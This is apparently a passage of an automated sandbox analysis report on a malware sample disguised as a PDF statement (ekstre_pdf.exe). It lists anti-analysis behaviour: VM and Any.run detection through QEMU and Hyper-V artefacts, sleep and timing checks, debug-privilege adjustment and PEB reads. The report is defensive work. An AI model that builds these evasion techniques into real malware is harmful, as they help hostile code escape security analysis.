Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\ekstre_pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ekstre_pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ekstre_pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ekstre_pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Windows\explorer.exe TID: 6996	Thread sleep count: 55 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6996	Thread sleep time: -110000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 6864	Thread sleep count: 112 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 6864	Thread sleep time: -224000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Code function: 1_2_340A1763 rdtsc

1_2_340A1763

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 877			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 863			Jump to behavior

Source: C:\Users\user\Desktop\ekstre_pdf.exe

API coverage: 1.0 %

Source: C:\Windows\SysWOW64\cmd.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C49
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 0_2_00406873 FindFirstFileW,FindClose,	0_2_00406873
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Users\user\Desktop\ekstre_pdf.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\ekstre_pdf.exe	API call chain: ExitProcess graph end node			graph_0-4449
Source: C:\Users\user\Desktop\ekstre_pdf.exe	API call chain: ExitProcess graph end node			graph_0-4605

Source: ekstre_pdf.exe, 00000000.00000002.3051035283.0000000006D09000.00000004.00000800.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3085454725.0000000005789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: ekstre_pdf.exe, 00000000.00000002.3051035283.0000000006D09000.00000004.00000800.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3085454725.0000000005789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ekstre_pdf.exe, 00000001.00000002.3085454725.0000000005789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: ekstre_pdf.exe, 00000000.00000002.3051035283.0000000006D09000.00000004.00000800.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3085454725.0000000005789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ekstre_pdf.exe, 00000000.00000002.3051035283.0000000006D09000.00000004.00000800.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3085454725.0000000005789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: explorer.exe, 00000002.00000002.7568464039.0000000008EE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2956783769.0000000008EE2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWER\S-1-5-21-3425316567-2969588382-3778222414-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: ekstre_pdf.exe, 00000000.00000002.3051035283.0000000006D09000.00000004.00000800.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3085454725.0000000005789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: ekstre_pdf.exe, 00000001.00000002.3085454725.0000000005789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: ekstre_pdf.exe, 00000001.00000002.3083908208.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.2935354613.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.3032322522.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3085010291.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6433528266.00000000104EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2982280367.00000000104EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4906824197.00000000104EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3104321870.00000000104EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6274387538.00000000104EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4904510788.00000000104EB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ekstre_pdf.exe, 00000000.00000002.3051035283.0000000006D09000.00000004.00000800.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3085454725.0000000005789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: ekstre_pdf.exe, 00000000.00000002.3051035283.0000000006D09000.00000004.00000800.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3085454725.0000000005789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: explorer.exe, 00000002.00000003.3112925903.00000000107A5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6438808376.00000000107A5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3115415404.00000000107A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6278555144.00000000107A5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4295442212.00000000107A5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7598813610.00000000107A5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2982280367.00000000107A5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ekstre_pdf.exe, 00000000.00000002.3051035283.0000000006D09000.00000004.00000800.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3085454725.0000000005789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: ekstre_pdf.exe, 00000001.00000002.3085454725.0000000005789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\ekstre_pdf.exe

0_2_6ED62351

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Code function: 1_2_340A1763 rdtsc

1_2_340A1763

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405640D mov eax, dword ptr fs:[00000030h]	1_2_3405640D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F6400 mov eax, dword ptr fs:[00000030h]	1_2_340F6400
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F6400 mov eax, dword ptr fs:[00000030h]	1_2_340F6400
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411F409 mov eax, dword ptr fs:[00000030h]	1_2_3411F409
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EF42F mov eax, dword ptr fs:[00000030h]	1_2_340EF42F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EF42F mov eax, dword ptr fs:[00000030h]	1_2_340EF42F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EF42F mov eax, dword ptr fs:[00000030h]	1_2_340EF42F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EF42F mov eax, dword ptr fs:[00000030h]	1_2_340EF42F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EF42F mov eax, dword ptr fs:[00000030h]	1_2_340EF42F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405B420 mov eax, dword ptr fs:[00000030h]	1_2_3405B420
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E9429 mov eax, dword ptr fs:[00000030h]	1_2_340E9429
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34097425 mov eax, dword ptr fs:[00000030h]	1_2_34097425
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34097425 mov ecx, dword ptr fs:[00000030h]	1_2_34097425
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070445 mov eax, dword ptr fs:[00000030h]	1_2_34070445
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070445 mov eax, dword ptr fs:[00000030h]	1_2_34070445
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070445 mov eax, dword ptr fs:[00000030h]	1_2_34070445
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070445 mov eax, dword ptr fs:[00000030h]	1_2_34070445
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070445 mov eax, dword ptr fs:[00000030h]	1_2_34070445
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34070445 mov eax, dword ptr fs:[00000030h]	1_2_34070445
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E0443 mov eax, dword ptr fs:[00000030h]	1_2_340E0443
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406D454 mov eax, dword ptr fs:[00000030h]	1_2_3406D454
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406D454 mov eax, dword ptr fs:[00000030h]	1_2_3406D454
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406D454 mov eax, dword ptr fs:[00000030h]	1_2_3406D454
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406D454 mov eax, dword ptr fs:[00000030h]	1_2_3406D454
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406D454 mov eax, dword ptr fs:[00000030h]	1_2_3406D454
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406D454 mov eax, dword ptr fs:[00000030h]	1_2_3406D454
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E45E mov eax, dword ptr fs:[00000030h]	1_2_3408E45E
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E45E mov eax, dword ptr fs:[00000030h]	1_2_3408E45E
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E45E mov eax, dword ptr fs:[00000030h]	1_2_3408E45E
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E45E mov eax, dword ptr fs:[00000030h]	1_2_3408E45E
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E45E mov eax, dword ptr fs:[00000030h]	1_2_3408E45E
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409D450 mov eax, dword ptr fs:[00000030h]	1_2_3409D450
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409D450 mov eax, dword ptr fs:[00000030h]	1_2_3409D450
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411F478 mov eax, dword ptr fs:[00000030h]	1_2_3411F478
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34068470 mov eax, dword ptr fs:[00000030h]	1_2_34068470
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34068470 mov eax, dword ptr fs:[00000030h]	1_2_34068470
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412A464 mov eax, dword ptr fs:[00000030h]	1_2_3412A464
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34060485 mov ecx, dword ptr fs:[00000030h]	1_2_34060485
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409648A mov eax, dword ptr fs:[00000030h]	1_2_3409648A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409648A mov eax, dword ptr fs:[00000030h]	1_2_3409648A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409648A mov eax, dword ptr fs:[00000030h]	1_2_3409648A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409B490 mov eax, dword ptr fs:[00000030h]	1_2_3409B490
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409B490 mov eax, dword ptr fs:[00000030h]	1_2_3409B490
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EC490 mov eax, dword ptr fs:[00000030h]	1_2_340EC490
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340944A8 mov eax, dword ptr fs:[00000030h]	1_2_340944A8
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340624A2 mov eax, dword ptr fs:[00000030h]	1_2_340624A2
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340624A2 mov ecx, dword ptr fs:[00000030h]	1_2_340624A2
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340ED4A0 mov ecx, dword ptr fs:[00000030h]	1_2_340ED4A0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340ED4A0 mov eax, dword ptr fs:[00000030h]	1_2_340ED4A0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340ED4A0 mov eax, dword ptr fs:[00000030h]	1_2_340ED4A0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F84BB mov eax, dword ptr fs:[00000030h]	1_2_340F84BB
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409E4BC mov eax, dword ptr fs:[00000030h]	1_2_3409E4BC
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340814C9 mov eax, dword ptr fs:[00000030h]	1_2_340814C9
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340814C9 mov eax, dword ptr fs:[00000030h]	1_2_340814C9
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340814C9 mov eax, dword ptr fs:[00000030h]	1_2_340814C9
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340814C9 mov eax, dword ptr fs:[00000030h]	1_2_340814C9
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340814C9 mov eax, dword ptr fs:[00000030h]	1_2_340814C9
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3408F4D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3408F4D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3408F4D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3408F4D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3408F4D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3408F4D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3408F4D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3408F4D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3408F4D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340844D1 mov eax, dword ptr fs:[00000030h]	1_2_340844D1
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340844D1 mov eax, dword ptr fs:[00000030h]	1_2_340844D1
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409E4EF mov eax, dword ptr fs:[00000030h]	1_2_3409E4EF
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409E4EF mov eax, dword ptr fs:[00000030h]	1_2_3409E4EF
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340954E0 mov eax, dword ptr fs:[00000030h]	1_2_340954E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411F4FD mov eax, dword ptr fs:[00000030h]	1_2_3411F4FD
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340894FA mov eax, dword ptr fs:[00000030h]	1_2_340894FA
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340664F0 mov eax, dword ptr fs:[00000030h]	1_2_340664F0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409A4F0 mov eax, dword ptr fs:[00000030h]	1_2_3409A4F0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409A4F0 mov eax, dword ptr fs:[00000030h]	1_2_3409A4F0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409C50D mov eax, dword ptr fs:[00000030h]	1_2_3409C50D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409C50D mov eax, dword ptr fs:[00000030h]	1_2_3409C50D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34062500 mov eax, dword ptr fs:[00000030h]	1_2_34062500
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405B502 mov eax, dword ptr fs:[00000030h]	1_2_3405B502
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov eax, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov eax, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov eax, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov eax, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov eax, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov eax, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov ecx, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov ecx, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov eax, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov eax, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov eax, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov eax, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F51B mov eax, dword ptr fs:[00000030h]	1_2_3410F51B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E507 mov eax, dword ptr fs:[00000030h]	1_2_3408E507
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E507 mov eax, dword ptr fs:[00000030h]	1_2_3408E507
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E507 mov eax, dword ptr fs:[00000030h]	1_2_3408E507
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E507 mov eax, dword ptr fs:[00000030h]	1_2_3408E507
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E507 mov eax, dword ptr fs:[00000030h]	1_2_3408E507
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E507 mov eax, dword ptr fs:[00000030h]	1_2_3408E507
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E507 mov eax, dword ptr fs:[00000030h]	1_2_3408E507
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408E507 mov eax, dword ptr fs:[00000030h]	1_2_3408E507
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EC51D mov eax, dword ptr fs:[00000030h]	1_2_340EC51D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34081514 mov eax, dword ptr fs:[00000030h]	1_2_34081514
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34081514 mov eax, dword ptr fs:[00000030h]	1_2_34081514
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34081514 mov eax, dword ptr fs:[00000030h]	1_2_34081514
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34081514 mov eax, dword ptr fs:[00000030h]	1_2_34081514
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34081514 mov eax, dword ptr fs:[00000030h]	1_2_34081514
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34081514 mov eax, dword ptr fs:[00000030h]	1_2_34081514
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409F523 mov eax, dword ptr fs:[00000030h]	1_2_3409F523
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407252B mov eax, dword ptr fs:[00000030h]	1_2_3407252B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407252B mov eax, dword ptr fs:[00000030h]	1_2_3407252B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407252B mov eax, dword ptr fs:[00000030h]	1_2_3407252B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407252B mov eax, dword ptr fs:[00000030h]	1_2_3407252B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407252B mov eax, dword ptr fs:[00000030h]	1_2_3407252B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407252B mov eax, dword ptr fs:[00000030h]	1_2_3407252B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407252B mov eax, dword ptr fs:[00000030h]	1_2_3407252B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34091527 mov eax, dword ptr fs:[00000030h]	1_2_34091527
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34063536 mov eax, dword ptr fs:[00000030h]	1_2_34063536
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34063536 mov eax, dword ptr fs:[00000030h]	1_2_34063536
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A2539 mov eax, dword ptr fs:[00000030h]	1_2_340A2539
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405753F mov eax, dword ptr fs:[00000030h]	1_2_3405753F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405753F mov eax, dword ptr fs:[00000030h]	1_2_3405753F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405753F mov eax, dword ptr fs:[00000030h]	1_2_3405753F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407E547 mov eax, dword ptr fs:[00000030h]	1_2_3407E547
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412A553 mov eax, dword ptr fs:[00000030h]	1_2_3412A553
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34096540 mov eax, dword ptr fs:[00000030h]	1_2_34096540
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34098540 mov eax, dword ptr fs:[00000030h]	1_2_34098540
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406254C mov eax, dword ptr fs:[00000030h]	1_2_3406254C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3413B55F mov eax, dword ptr fs:[00000030h]	1_2_3413B55F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3413B55F mov eax, dword ptr fs:[00000030h]	1_2_3413B55F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407C560 mov eax, dword ptr fs:[00000030h]	1_2_3407C560
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E9567 mov eax, dword ptr fs:[00000030h]	1_2_340E9567
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34107591 mov edi, dword ptr fs:[00000030h]	1_2_34107591
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DE588 mov eax, dword ptr fs:[00000030h]	1_2_340DE588
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DE588 mov eax, dword ptr fs:[00000030h]	1_2_340DE588
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409A580 mov eax, dword ptr fs:[00000030h]	1_2_3409A580
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409A580 mov eax, dword ptr fs:[00000030h]	1_2_3409A580
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34099580 mov eax, dword ptr fs:[00000030h]	1_2_34099580
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34099580 mov eax, dword ptr fs:[00000030h]	1_2_34099580
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411F582 mov eax, dword ptr fs:[00000030h]	1_2_3411F582
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EC592 mov eax, dword ptr fs:[00000030h]	1_2_340EC592
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34092594 mov eax, dword ptr fs:[00000030h]	1_2_34092594
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E85AA mov eax, dword ptr fs:[00000030h]	1_2_340E85AA
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340645B0 mov eax, dword ptr fs:[00000030h]	1_2_340645B0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340645B0 mov eax, dword ptr fs:[00000030h]	1_2_340645B0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3405F5C7
